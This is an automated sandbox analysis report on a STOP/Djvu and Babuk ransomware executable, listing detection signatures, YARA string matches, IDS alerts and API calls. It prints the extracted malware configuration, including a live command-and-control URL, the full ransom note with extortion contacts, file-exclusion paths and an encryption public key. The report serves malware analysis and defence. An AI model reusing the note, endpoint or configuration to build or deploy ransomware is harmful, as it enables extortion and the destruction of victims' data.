Windows Analysis Report
3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe

Overview

General Information

Sample name:3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
Analysis ID:1375050
MD5:de93e8a0692db2c2f178270b8da7b5d7
SHA1:21df7a70852c9d47b3423d14005bf67a69e6fdcc
SHA256:1ca8ad78274a829697b8381e96b914fea1a65b5b2351f536325d2143d689426e
Tags:exe
Infos:

Detection

Babuk, Djvu
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected Babuk Ransomware
Yara detected Djvu Ransomware
C2 URLs / IPs found in malware configuration
Found stalling execution ending in API Sleep call
Infects executable files (exe, dll, sys, html)
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • cleanup
Name:Babuk
Description:Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time as well. It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.
Attribution:No Attribution
Blogpost URLs:
Link:https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk

Name:STOP, Djvu
Description:STOP Djvu Ransomware is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It does not encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.
Attribution:No Attribution
Blogpost URLs:
Link:https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

{"Download URLs": [""], "C2 url": "http://zexeq.com/test2/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-eyUsqpKbFl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0816JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", 
"C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9PaQxc48MHJcxf+pQ9kwlIqCFp1AISoc\\\\nD8u0WRuNJXpbI822Tk6jY+ocBe38ntpgWsHzMuugGSR4rZz+f4g+rHjhSl73yfWg\\\\nXo8WM6KaBF3hVQKXnqxrSbpyp3STRnNyXF1xEG0q5H8GtE1HVPewj6w73sukHLq7\\\\nnaIJZ131m+quVE3\\/X8KAKbccAihBy8WqIpWFKVObrdaRt9NE\\/0ucb4JC0vpMN43+\\\\nrbV7gx2ad6OZz+phEqMUN8t5js9kHY3mwuM621LU9xjOYs15\\/uBs1woTYINVPXC7\\\\nHwIDAQAB\\\\n-----END PUBLIC KEY-----"}
Source | Rule | Description | Author | Strings
3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe | JoeSecurity_Djvu | Yara detected Djvu Ransomware | Joe Security |
3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe | Windows_Ransomware_Stop_1e8d48ff | unknown | unknown |
• 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
• 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe | MALWARE_Win_STOP | Detects STOP ransomware | ditekSHen |
• 0xfe888:$x1: C:\SystemID\PersonalID.txt
• 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
• 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
• 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
• 0xfecec:$s1: " --AutoStart
• 0xfed00:$s1: " --AutoStart
• 0x102948:$s2: --ForNetRes
• 0x102910:$s3: --Admin
• 0x102d90:$s4: %username%
• 0x102eb4:$s5: ?pid=
• 0x102ec0:$s6: &first=true
• 0x102ed8:$s6: &first=false
• 0xfedf4:$s7: delself.bat
• 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
• 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
• 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe | JoeSecurity_Djvu | Yara detected Djvu Ransomware | Joe Security |
C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe | Windows_Ransomware_Stop_1e8d48ff | unknown | unknown |
• 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
• 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe | MALWARE_Win_STOP | Detects STOP ransomware | ditekSHen |
• 0xfe888:$x1: C:\SystemID\PersonalID.txt
• 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
• 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
• 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
• 0xfecec:$s1: " --AutoStart
• 0xfed00:$s1: " --AutoStart
• 0x102948:$s2: --ForNetRes
• 0x102910:$s3: --Admin
• 0x102d90:$s4: %username%
• 0x102eb4:$s5: ?pid=
• 0x102ec0:$s6: &first=true
• 0x102ed8:$s6: &first=false
• 0xfedf4:$s7: delself.bat
• 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
• 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
• 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

Source | Rule | Description | Author | Strings
00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Djvu | Yara detected Djvu Ransomware | Joe Security |
00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp | Windows_Ransomware_Stop_1e8d48ff | unknown | unknown |
• 0x39b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
00000003.00000000.1671969796.0000000000E31000.00000020.00000001.01000000.00000007.sdmp | Windows_Ransomware_Stop_1e8d48ff | unknown | unknown |
• 0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000002.00000000.1664627925.0000000000461000.00000020.00000001.01000000.00000003.sdmp | Windows_Ransomware_Stop_1e8d48ff | unknown | unknown |
• 0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_Djvu | Yara detected Djvu Ransomware | Joe Security |

Source | Rule | Description | Author | Strings
3.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack | JoeSecurity_Djvu | Yara detected Djvu Ransomware | Joe Security |
3.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack | Windows_Ransomware_Stop_1e8d48ff | unknown | unknown |
• 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
• 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
3.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack | MALWARE_Win_STOP | Detects STOP ransomware | ditekSHen |
• 0xfe888:$x1: C:\SystemID\PersonalID.txt
• 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
• 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
• 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
• 0xfecec:$s1: " --AutoStart
• 0xfed00:$s1: " --AutoStart
• 0x102948:$s2: --ForNetRes
• 0x102910:$s3: --Admin
• 0x102d90:$s4: %username%
• 0x102eb4:$s5: ?pid=
• 0x102ec0:$s6: &first=true
• 0x102ed8:$s6: &first=false
• 0xfedf4:$s7: delself.bat
• 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
• 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
• 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack | JoeSecurity_Djvu | Yara detected Djvu Ransomware | Joe Security |
0.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack | Windows_Ransomware_Stop_1e8d48ff | unknown | unknown |
• 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
• 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF

              No Sigma rule has matched

Timestamp:01/16/24-00:41:03.506186
Source IP:192.168.2.4
Destination IP:175.119.10.231
SID:2833438
Source Port:49733
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:01/16/24-00:41:20.984825
Source IP:192.168.2.4
Destination IP:175.119.10.231
SID:2833438
Source Port:49746
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:01/16/24-00:41:09.184797
Source IP:192.168.2.4
Destination IP:175.119.10.231
SID:2833438
Source Port:49736
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:01/16/24-00:41:15.342258
Source IP:192.168.2.4
Destination IP:175.119.10.231
SID:2833438
Source Port:49737
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

AV Detection

Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe | Avira: detected
Source: http://zexeq.com/test2/get.php?pid=F8AFCDC4E | Avira URL Cloud: Label: malware
Source: http://zexeq.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 | Avira URL Cloud: Label: malware
Source: http://zexeq.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true | Avira URL Cloud: Label: malware
Source: http://zexeq.com/test2/get.php | Avira URL Cloud: Label: malware
Source: http://zexeq.com/test2/get.phpp | Avira URL Cloud: Label: malware
              Source: 0.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpackMalware Configuration Extractor: Djvu {"Download URLs": [""], "C2 url": "http://zexeq.com/test2/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-eyUsqpKbFl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0816JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", 
"C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData
Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe | Joe Sandbox ML: detected
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00471178 CryptDestroyHash,CryptReleaseContext,0_2_00471178
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0046E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,0_2_0046E870
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0046EA51 CryptDestroyHash,CryptReleaseContext,0_2_0046EA51
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0046EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,0_2_0046EAA0
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0046EC68 CryptDestroyHash,CryptReleaseContext,0_2_0046EC68
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00470FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,0_2_00470FC0
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_0046E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0046E870
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_0046EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0046EAA0
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_00470FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,2_2_00470FC0
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_00471178 CryptDestroyHash,CryptReleaseContext,2_2_00471178
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_0046EA51 CryptDestroyHash,CryptReleaseContext,2_2_0046EA51
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_0046EC68 CryptDestroyHash,CryptReleaseContext,2_2_0046EC68
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E3E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,3_2_00E3E870
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E3EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,3_2_00E3EAA0
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E40FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,3_2_00E40FC0
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E41178 CryptDestroyHash,CryptReleaseContext,3_2_00E41178
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E3EA51 CryptDestroyHash,CryptReleaseContext,3_2_00E3EA51
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E3EC68 CryptDestroyHash,CryptReleaseContext,3_2_00E3EC68
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E41178 CryptDestroyHash,CryptReleaseContext,4_2_00E41178
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E3E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,4_2_00E3E870
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E3EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,4_2_00E3EAA0
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E3EA51 CryptDestroyHash,CryptReleaseContext,4_2_00E3EA51
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E3EC68 CryptDestroyHash,CryptReleaseContext,4_2_00E3EC68
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E40FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,4_2_00E40FC0
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P2_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P2_2_00479E70
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeBinary or memory string: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P
